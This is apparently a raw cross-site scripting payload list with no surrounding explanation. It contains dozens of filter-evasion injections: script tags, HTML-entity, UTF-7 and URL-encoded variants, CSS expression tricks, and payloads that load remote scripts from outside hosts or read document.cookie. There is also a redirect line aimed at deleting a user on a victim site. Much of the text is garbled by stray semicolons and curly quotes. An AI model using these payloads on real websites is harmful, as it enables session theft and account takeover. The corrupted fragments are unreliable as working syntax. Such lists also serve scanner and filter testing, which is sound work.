</script><script>alert(1)</script> </br style=a:expression(alert())> <scrscriptipt>alert(1)</scrscriptipt> <br size=\"&{alert('XSS')}\"> perl -e 'print \"<IMG SRC=javascript:alert(\"XSS\")>\";' > out perl -e 'print \"<SCRIPT>alert(\"XSS\")</SCRIPT>\";' > out “>alert(‘XSS’) XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))> XSS 
STYLE=xss:e/**/xpression(alert(‘XSS’))> ‘;;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//”;;alert(String.fromCharCode(88,83,83))//\”;;alert(String.fromCharCode(88,83,83))//–>;;”;>;';>;;alert(String.fromCharCode(88,83,83)); ‘;';;!–“;;=&;{()} ;alert(‘;XSS';); ;; ;alert(String.fromCharCode(88,83,83)); ; ; ; ; ; ; ; ;;; ;; ; ; ; ; ; ; Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser exp/*<;XSS STYLE=';no\xss:noxss(";*//*";); ;li {list-style-image: url(“;javascript:alert('XSS')”;);};;;XSS ; ;; ; %BCscript%BEalert(%A2XSS%A2)%BC/script%BE ; ; ; ; ;; ;;; ;; a=”;get”;;&;#10;b=”;URL(“;”;;&;#10;c=”;javascript:”;;&;#10;d=”;alert(‘;XSS';);”;)”;; eval(a+b+c+d); ;alert(‘;XSS';);; ; ; ;.XSS{background-image:url(“;javascript:alert(‘;XSS';)”;);};;; ;BODY{background:url(“;javascript:alert(‘;XSS';)”;)}; ; ; ;@import';http://ha.ckers.org/xss.css';;; <;META HTTP-EQUIV=";Link"; Content=";;; REL=stylesheet”;>; ;BODY{-moz-binding:url(“;http://ha.ckers.org/xssmoz.xml#xss”;)}; ;; ;;;; ; ;;;<;![CDATA[;;]]>; ;;;<;IMG SRC=";javas;cript:alert(‘;XSS';)”;>;;;; ;; ;; ; <;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=;alert(‘;XSS';);”;>; ; ;; <;!–#exec cmd=";/bin/echo ';;;;';”;–>; <;? 
echo(';<;SCR)';; ; ; ; ; ; ; ; ; ; ;; ;+ADw-SCRIPT+AD4-alert(‘;XSS';);+ADw-/SCRIPT+AD4- \”;;alert(‘;XSS';);// ;;alert(“XSS”);; ;@im\port';\ja\vasc\ript:alert(“;XSS”;)';;; ; ; ; ; ; perl -e ‘;print “;”;;';>; out perl -e ‘;print “;&;;alert(“;XSS”;);”;;'; >; out ; ;; ; <;SCRIPT SRC=http://ha.ckers.org/xss.js ; <;IMG SRC=";javascript:alert(';XSS';)"; <;IFRAME SRC=http://ha.ckers.org/scriptlet.html <; <;;alert(“;XSS”;);//<;; ;;alert(“;XSS”;);”;>; ;a=/XSS/ ;”; SRC=”;http://ha.ckers.org/xss.js”;>;; ;; ;; ;';”; SRC=”;http://ha.ckers.org/xss.js”;>;; ;` SRC=”;http://ha.ckers.org/xss.js”;>;; ;document.write(“;<;SCRI";);;PT SRC=”;http://ha.ckers.org/xss.js”;>;; ‘;>”; SRC=”;http://ha.ckers.org/xss.js”;>;; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; document.vulnerable=true; <document.vulnerable=true;//< <script document.vulnerable=true; <img SRC="javascript:document.vulnerable=true;" <iframe src="javascript:document.vulnerable=true; < a=/XSS/\ndocument.vulnerable=true; \”;document.vulnerable=true;;// document.vulnerable=true; li {list-style-image: url(“javascript:document.vulnerable=true;”);XSS 1script3document.vulnerable=true;1/script3 @im\port’\ja\vasc\ript:document.vulnerable=true'; exp/* document.vulnerable=true; .XSS{background-image:url(“javascript:document.vulnerable=true”);} BODY{background:url(“javascript:document.vulnerable=true”)} <![<IMG SRC="javas]]]] <IMG SRC="javascript:document.vulnerable=true”> <t:set attributeName="innerHTML" to="XSSdocument.vulnerable=true”> <? 
echo('document.vulnerable=true’); ?> <meta HTTP-EQUIV="Set-Cookie" Content="USERID=document.vulnerable=true”> +ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- &document.vulnerable=true; <a href="about:document.vulnerable=true;”> document.vulnerable=true; <!–document.vulnerable=true;//–> <document.vulnerable=true; <![<!–]]document.vulnerable=true;//–> document.vulnerable=true; ” onmouseover=”document.vulnerable=true;”> document.vulnerable=true;; [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> @import’http://www.securitycompass.com/xss.css'; <meta HTTP-EQUIV="Link" Content="; REL=stylesheet”> BODY{-moz-binding:url(“http://www.securitycompass.com/xssmoz.xml#xss”)} XSS <!–#exec cmd="/bin/echo ' ” SRC=”http://www.securitycompass.com/xss.js”> ” SRC=”http://www.securitycompass.com/xss.js”> ” ” SRC=”http://www.securitycompass.com/xss.js”> ‘” SRC=”http://www.securitycompass.com/xss.js”> ` SRC=”http://www.securitycompass.com/xss.js”> ‘>” SRC=”http://www.securitycompass.com/xss.js”> document.write(“<SCRI");PT SRC=”http://www.securitycompass.com/xss.js”> [Mozilla] “;>;; ;;alert(1); ; ;alert(1); ; perl -e 'print \”;;\”;;' >; out perl -e 'print \”;;alert(\”;XSS\”;);\”;;' >; out “>alert(‘XSS’) XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))> XSS STYLE=xss:e/**/xpression(alert(‘XSS’))> >”>alert(“XSS”)& “>@import”javascript:alert(‘XSS’)”; >”‘> >%22%27> ‘%uff1cscript%uff1ealert(‘XSS’)%uff1c/script%uff1e’ ”;!–“= <IMG SRC=JaVaScRiPt:alert("XSS")> <IMGSRC=java&#115;crip&#116;:ale&#114;t('X&#83;S'&#41> <IMGSRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMGSRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert(‘XSS’);”> <IMG SRC="jav ascript:alert(‘XSS’);”> <![CDATA[var n=0;while(true){n++;}]]> 
<![CDATA[SCRIPT]]>alert(‘gotcha’);<![CDATA[/SCRIPT]]> <!DOCTYPE foo []>&xee; <!DOCTYPE foo []>&xee; <!DOCTYPE foo []>&xee; <!DOCTYPE foo []>&xee; alert(‘XSS’) %3cscript%3ealert(‘XSS’)%3c/script%3e %22%3e%3cscript%3ealert(‘XSS’)%3c/script%3e alert(“XSS”)”> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < <alert(“XSS”);//< %253cscript%253ealert(1)%253c/script%253e “>alert(document.cookie) fooalert(1) <script>alert(1)</script> String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41) ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) =(◕_◕)=" />


+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
“>alert(document.cookie)
“>alert(document.cookie)
“><alert(document.cookie);//<
fooalert(document.cookie)
<script>alert(document.cookie)</script>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
‘; alert(document.cookie); var foo=’
foo\’; alert(document.cookie);//’;
alert(document.cookie)

alert(1)
“>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))






xxs link
xxs link
alert(“XSS”)”>












<alert(“XSS”);//<
<SCRIPT SRC=http://ha.ckers.org/xss.js?

<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
alert(‘XSS’);
alert(“XSS”);



li {list-style-image: url(“javascript:alert(‘XSS’)”);}